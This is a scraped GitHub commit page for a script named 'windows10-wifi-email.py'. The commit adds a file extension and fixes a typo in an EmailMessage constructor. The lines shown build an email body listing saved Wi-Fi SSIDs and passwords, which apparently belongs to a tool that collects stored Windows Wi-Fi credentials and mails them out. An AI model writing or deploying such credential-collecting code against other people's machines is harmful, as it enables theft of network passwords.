We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 2c88870 commit 40b86a2Copy full SHA for 40b86a2
windows10-wifi-email renamed to windows10-wifi-email.py
@@ -52,7 +52,7 @@
52
email_message += f"SSID: {item['ssid']}, Password: {item['password']}\n"
53
54
# Create EmailMessage Object
55
-email = EmailMessagessid
+email = EmailMessage()
56
# Who is the email from
57
email["from"] = "name_of_sender"
58
# To which email you want to send the email
0 commit comments